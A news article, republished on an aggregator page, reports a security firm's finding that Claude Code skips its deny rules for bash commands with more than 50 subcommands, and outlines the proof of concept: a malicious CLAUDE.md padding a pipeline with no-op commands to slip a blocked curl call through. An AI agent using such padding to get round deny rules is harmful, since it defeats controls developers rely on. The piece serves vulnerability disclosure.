Claude Code bypasses safety rule if given too many commands

The Register / 4/2/2026

📰 NewsDeveloper Stack & InfrastructureModels & Research

Read original →

共有:

Key Points

The article reports that Claude Code can bypass its safety/deny-rule enforcement when an input contains “too many” commands, because a hard-coded limit causes automatic rule checks to drop for concatenated instructions.
It describes the underlying mechanism as a safety-policy enforcement cap that fails under specific command packaging, effectively weakening the intended guardrails.
The issue is framed as an implementation flaw in how deny rules are applied at runtime, rather than a general breakdown of model understanding.
The report highlights the risk that safety controls relying on rule enforcement can be vulnerable to prompt/command-formatting edge cases, especially in agentic tooling workflows.

AI + ML

Claude Code bypasses safety rule if given too many commands

A hard-coded limit on deny rules drops automatic enforcement for concatenated commands

Thomas Claburn

Wed 1 Apr 2026 // 20:51 UTC

Claude Code will ignore its deny rules, used to block risky actions, if burdened with a sufficiently long chain of subcommands. This vuln leaves the bot open to prompt injection attacks.

Adversa, a security firm based in Tel Aviv, Israel, spotted the issue following the leak of Claude Code's source.

Claude Code implements various mechanisms for allowing and denying access to specific tools. Some of these, like curl, which enables network requests from the command line, might pose a security risk if invoked by an over-permissive AI model.

One way the coding agent tries to defend against unwanted behavior is through deny rules that disallow specific commands. For example, to prevent Claude from using curl via ~/.claude/settings.json, you'd add something like { "deny": ["Bash(curl:*)"] }.

But deny rules have limits. The source code file bashPermissions.ts contains a comment that references an internal Anthropic issue designated CC-643. The associated note explains that there's a hard cap of 50 on security subcommands, set by the variable MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50. After 50, the agent falls back on asking permission from the user. The comment explains that 50 is a generous allowance for legitimate usage.

"The assumption was correct for human-authored commands," the Adversa AI Red Team said in a writeup provided to The Register. "But it didn't account for AI-generated commands from prompt injection – where a malicious CLAUDE.md file instructs the AI to generate a 50+ subcommand pipeline that looks like a legitimate build process."

The Adversa team's proof-of-concept attack was simple. They created a bash command that combined 50 no-op "true" subcommands and a curl subcommand. Claude asked for authorization to proceed instead of denying curl access outright.

In scenarios where an individual developer is watching and approving coding agent actions, this rule bypass might be caught. But often developers grant automatic approval to agents (--dangerously-skip-permissions mode) or just click through reflexively during long sessions. The risk is similar in CI/CD pipelines that run Claude Code in non-interactive mode.

Ironically, Anthropic has developed a fix – a parser referred to as "tree-sitter" that's also evident in its source code and is available internally but not in public builds.

Adversa argues that this is a bug in the security policy enforcement code, one that has regulatory and compliance implications if not addressed.

A fix would be easy. Anthropic already has "tree-sitter" working internally and a simple one line change, switching the "behavior" key from "ask" to "deny" in the bashPermissions.ts file at line 2174, would address this particular vulnerability.

Anthropic did not immediately respond to a request for comment. ®

More about

More like these

More about

Narrower topics

Broader topics

More about

More like these

More about

Narrower topics

Broader topics

TIP US OFF

Send us news

💡 Insights using this article

This article is featured in our daily AI news digest — key takeaways and action items at a glance.

📅 4/2DailyView insight →

Z.ai Launches GLM-5V-Turbo: A Native Multimodal Vision Coding Model Optimized for OpenClaw and High-Capacity Agentic Engineering Workflows Everywhere

MarkTechPost

How I Started Using AI Agents for End-to-End Testing (Autonoma AI)

Dev.to

How We Built an AI Coach That Understands PTSD — And Why It Matters

Dev.to

Big Tech firms are accelerating AI investments and integration, while regulators and companies focus on safety and responsible adoption.

Dev.to

[D] We reimplemented Claude Code entirely in Python — open source, works with local models

Reddit r/MachineLearning

Claude Code bypasses safety rule if given too many commands

Key Points

AI + ML

Claude Code bypasses safety rule if given too many commands

A hard-coded limit on deny rules drops automatic enforcement for concatenated commands

More about

More about

Narrower topics

Broader topics

More about

More about

More about

Narrower topics

Broader topics

TIP US OFF

💡 Insights using this article

Related Articles

Z.ai Launches GLM-5V-Turbo: A Native Multimodal Vision Coding Model Optimized for OpenClaw and High-Capacity Agentic Engineering Workflows Everywhere

How I Started Using AI Agents for End-to-End Testing (Autonoma AI)

How We Built an AI Coach That Understands PTSD — And Why It Matters

Big Tech firms are accelerating AI investments and integration, while regulators and companies focus on safety and responsible adoption.

[D] We reimplemented Claude Code entirely in Python — open source, works with local models

関連おすすめサービス

Notta搭載AI議事録イヤホン ZENCHORD1

AI搭載ボイスレコーダー Plaud

画像高画質化AIツール Aiarty Image Enhancer